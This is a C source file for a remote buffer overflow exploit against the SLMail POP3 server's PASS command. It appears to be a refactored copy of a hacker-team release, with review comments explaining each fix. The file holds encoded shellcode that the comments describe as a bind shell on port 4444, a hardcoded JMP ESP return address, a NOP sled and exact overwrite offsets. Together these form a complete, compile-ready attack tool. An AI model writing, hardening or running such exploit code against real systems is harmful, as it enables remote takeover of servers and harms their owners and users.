
/*

SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-?????


???????????????? 31337 Team
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <winsock2.h>
#include <windows.h>

/*
 * Payload bytes that exploit() copies into the PASS argument. The listing
 * is 351 bytes (23 rows of 15 plus a final row of 6); exploit() copies it
 * with an explicit length, so the trailing NUL added by the string-literal
 * syntax is not sent.
 *
 * The original author's only comment was "bind 4444", i.e. a bind shell
 * listening on TCP 4444 - NOT verified here; disassemble before reuse.
 * NOTE(review): the opening bytes (an FPU instruction followed by
 * fnstenv [esp-0xc] and a pop) look like a GetPC stub of a self-decoding
 * encoder, so the bytes below are presumably not plain shellcode - confirm
 * with a disassembler.
 *
 * The original exploit() formatted this buffer with "%s", so it must contain
 * no 0x00 byte; a scan of the rows below finds none, but re-check whenever
 * the payload is replaced.
 */

unsigned char shellcode[] =
"\xdb\xd5\xbe\xbb\xb9\x4c\xe1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x13\x03\xc9\xaa\xae\x14\xd1\x25\xac"
"\xd7\x29\xb6\xd1\x5e\xcc\x87\xd1\x05\x85\xb8\xe1\x4e\xcb\x34"
"\x89\x03\xff\xcf\xff\x8b\xf0\x78\xb5\xed\x3f\x78\xe6\xce\x5e"
"\xfa\xf5\x02\x80\xc3\x35\x57\xc1\x04\x2b\x9a\x93\xdd\x27\x09"
"\x03\x69\x7d\x92\xa8\x21\x93\x92\x4d\xf1\x92\xb3\xc0\x89\xcc"
"\x13\xe3\x5e\x65\x1a\xfb\x83\x40\xd4\x70\x77\x3e\xe7\x50\x49"
"\xbf\x44\x9d\x65\x32\x94\xda\x42\xad\xe3\x12\xb1\x50\xf4\xe1"
"\xcb\x8e\x71\xf1\x6c\x44\x21\xdd\x8d\x89\xb4\x96\x82\x66\xb2"
"\xf0\x86\x79\x17\x8b\xb3\xf2\x96\x5b\x32\x40\xbd\x7f\x1e\x12"
"\xdc\x26\xfa\xf5\xe1\x38\xa5\xaa\x47\x33\x48\xbe\xf5\x1e\x05"
"\x73\x34\xa0\xd5\x1b\x4f\xd3\xe7\x84\xfb\x7b\x44\x4c\x22\x7c"
"\xab\x67\x92\x12\x52\x88\xe3\x3b\x91\xdc\xb3\x53\x30\x5d\x58"
"\xa3\xbd\x88\xcf\xf3\x11\x63\xb0\xa3\xd1\xd3\x58\xa9\xdd\x0c"
"\x78\xd2\x37\x25\x13\x29\xd0\x8a\x4c\x11\x02\x63\x8f\x51\x53"
"\x2f\x06\xb7\x39\xdf\x4e\x60\xd6\x46\xcb\xfa\x47\x86\xc1\x87"
"\x48\x0c\xe6\x78\x06\xe5\x83\x6a\xff\x05\xde\xd0\x56\x19\xf4"
"\x7c\x34\x88\x93\x7c\x33\xb1\x0b\x2b\x14\x07\x42\xb9\x88\x3e"
"\xfc\xdf\x50\xa6\xc7\x5b\x8f\x1b\xc9\x62\x42\x27\xed\x74\x9a"
"\xa8\xa9\x20\x72\xff\x67\x9e\x34\xa9\xc9\x48\xef\x06\x80\x1c"
"\x76\x65\x13\x5a\x77\xa0\xe5\x82\xc6\x1d\xb0\xbd\xe7\xc9\x34"
"\xc6\x15\x6a\xba\x1d\x9e\x9a\xf1\x3f\xb7\x32\x5c\xaa\x85\x5e"
"\x5f\x01\xc9\x66\xdc\xa3\xb2\x9c\xfc\xc6\xb7\xd9\xba\x3b\xca"
"\x72\x2f\x3b\x79\x72\x7a";
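/* Layout of the 3000-byte PASS argument, in byte offsets. The values are
 * those of the original, which expressed them through int-pointer arithmetic
 * (652 ints = 2608 bytes, +4 ints = 2624 bytes) and a *(long *) store. */
enum {
    EVIL_LEN    = 3000, /* payload bytes sent after "PASS " */
    RET_OFFSET  = 2606, /* 4-byte saved-return overwrite */
    SLED_OFFSET = 2608, /* 8-byte NOP sled; its first two bytes are then
                           clobbered by the address written at RET_OFFSET */
    SLED_LEN    = 8,
    CODE_OFFSET = 2624, /* shellcode start: 2624 + 351 = 2975 < 3000 */
    REPLY_MAX   = 200   /* bytes read per server reply, as in the original */
};

/* Read one server reply (at most REPLY_MAX bytes), NUL-terminate it and echo
 * it. Returns the byte count, or -1 when recv() fails or the peer closed the
 * connection. The original printed the raw buffer without terminating it. */
static int read_reply(int sock, char *reply, size_t cap)
{
    int want = (cap - 1 < (size_t)REPLY_MAX) ? (int)(cap - 1) : REPLY_MAX;
    int got = recv(sock, reply, want, 0);
    if (got <= 0) {
        printf("[-] recv() failed or connection closed\n");
        return -1;
    }
    reply[got] = '\0'; /* recv() does not terminate; printf("%s") needs it */
    printf("[+] %s", reply);
    return got;
}

/* Send the whole buffer, looping on short writes. Returns 0 on success, -1
 * if send() fails (the original ignored send()'s return value). */
static int send_all(int sock, const void *data, size_t len)
{
    const char *p = data;
    size_t done = 0;
    while (done < len) {
        int n = send(sock, p + done, (int)(len - done), 0);
        if (n <= 0) {
            printf("[-] send() failed\n");
            return -1;
        }
        done += (size_t)n;
    }
    return 0;
}

/* Fill evil[] (EVIL_LEN bytes, caller-provided) with the attack string.
 * Write order matters: the sled goes in before the return address so that the
 * address overwrites the first two sled bytes exactly as the original did. */
static void build_payload(unsigned char *evil)
{
    /* 0x5f4a358f in little-endian byte order - what the original's
     * *(long *)&evil[2606] = 0x5f4a358f produced on 32-bit Windows. Spelled
     * out as bytes so the result no longer depends on sizeof(long), alignment
     * or host endianness. The original carried a commented-out alternative
     * labelled "JMP ESP XP 7CB41020", so this value is presumably also a
     * JMP ESP gadget for the targeted SLMail/Windows build - confirm before
     * relying on it. */
    static const unsigned char ret_addr[4] = { 0x8f, 0x35, 0x4a, 0x5f };

    memset(evil, 0x41, EVIL_LEN);
    memset(evil + SLED_OFFSET, 0x90, SLED_LEN);
    memcpy(evil + CODE_OFFSET, shellcode, sizeof shellcode - 1); /* drop the literal's NUL */
    memcpy(evil + RET_OFFSET, ret_addr, sizeof ret_addr);
}

/*
 * Drive the POP3 exchange on an already-connected socket and deliver the
 * oversized PASS argument.
 *
 * sock: connected TCP socket from connect_target(). The banner and the USER
 * reply are echoed to stdout. On any socket error a message is printed and
 * the function returns early without sending the rest.
 *
 * Last command on the wire: "PASS " + EVIL_LEN payload bytes + "\r\n", sent
 * with an explicit length. The original built it with sprintf("%s") and sent
 * strlen() bytes, which would silently truncate at any NUL in the shellcode.
 *
 * Only run against systems you are authorised to test.
 */
void exploit(int sock)
{
    static const char userbuf[] = "USER madivan\r\n";
    static const char pass_cmd[] = "PASS ";
    static const char crlf[] = "\r\n";
    unsigned char evil[EVIL_LEN];
    char line[sizeof pass_cmd - 1 + EVIL_LEN + sizeof crlf - 1];
    char receive[1024];
    size_t len = 0;

    build_payload(evil);

    /* banner */
    if (read_reply(sock, receive, sizeof receive) < 0)
        return;

    /* user */
    printf("[+] Sending Username...\n");
    if (send_all(sock, userbuf, sizeof userbuf - 1) < 0)
        return;
    if (read_reply(sock, receive, sizeof receive) < 0)
        return;

    /* passwd */
    printf("[+] Sending Evil buffer...\n");
    memcpy(line + len, pass_cmd, sizeof pass_cmd - 1);
    len += sizeof pass_cmd - 1;
    memcpy(line + len, evil, EVIL_LEN);
    len += EVIL_LEN;
    memcpy(line + len, crlf, sizeof crlf - 1);
    len += sizeof crlf - 1;
    (void)send_all(sock, line, len);
}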

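/*
 * Resolve host, open a TCP connection to host:port and return the socket.
 *
 * host: hostname or dotted IPv4 address (gethostbyname() is IPv4-only).
 * port: TCP port in host byte order.
 * Returns the connected socket as an int, which the callers hand to
 * exploit() and closesocket(). On any failure a message is printed and the
 * process exits with EXIT_FAILURE; the original exited with status 0, which
 * made failures look like success to a calling script.
 *
 * Winsock is initialised here; the caller is expected to WSACleanup() once
 * it is done with the socket.
 */
int connect_target(char *host, u_short port)
{
    WSADATA wsa;
    struct hostent *hp;
    struct sockaddr_in sa;
    SOCKET s;

    /* the original ignored this result and went on to use the socket API */
    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("[-] WSAStartup() failed\n");
        exit(EXIT_FAILURE);
    }

    /* gethostbyname() is deprecated and IPv4-only; kept because getaddrinfo()
     * would need ws2tcpip.h, which this file does not include. */
    hp = gethostbyname(host);
    if (hp == NULL || hp->h_addrtype != AF_INET || hp->h_addr_list[0] == NULL
        || hp->h_length != (int)sizeof sa.sin_addr) {
        printf("gethostbyname() error!\n");
        WSACleanup();
        exit(EXIT_FAILURE);
    }
    printf("[+] Connecting to %s\n", host);

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    /* first resolved address; the original dereferenced h_addr_list without
     * checking that it held an entry of the expected type and length */
    memcpy(&sa.sin_addr, hp->h_addr_list[0], sizeof sa.sin_addr);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        printf("[-] socket blah?\n");
        WSACleanup();
        exit(EXIT_FAILURE);
    }
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) == SOCKET_ERROR) {
        printf("[-] connect() blah!\n");
        closesocket(s); /* the original leaked the descriptor here */
        WSACleanup();
        exit(EXIT_FAILURE);
    }
    printf("[+] Connected to %s\n", host);

    /* SOCKET is an unsigned integer type; the int return type is kept for the
     * existing callers (it was the original's choice and is lossless on the
     * 32-bit Windows builds this exploit targets). */
    return (int)s;
}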

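/*
 * Entry point. Usage: slmail-ex.exe <host>; the POP3 port is fixed at 110.
 * Returns 0 once the payload has been sent, EXIT_FAILURE on a usage error
 * (connection failures exit from inside connect_target()). The original
 * returned 0 for the usage error as well and never called WSACleanup().
 */
int main(int argc, char **argv)
{
    enum { POP3_PORT = 110 };
    int sock;

    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
    if (argc < 2) {
        printf("usage: slmail-ex.exe <host> \n\n");
        return EXIT_FAILURE;
    }

    sock = connect_target(argv[1], POP3_PORT);
    exploit(sock);
    closesocket(sock);
    WSACleanup(); /* balances the WSAStartup() done in connect_target() */
    return 0;
}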
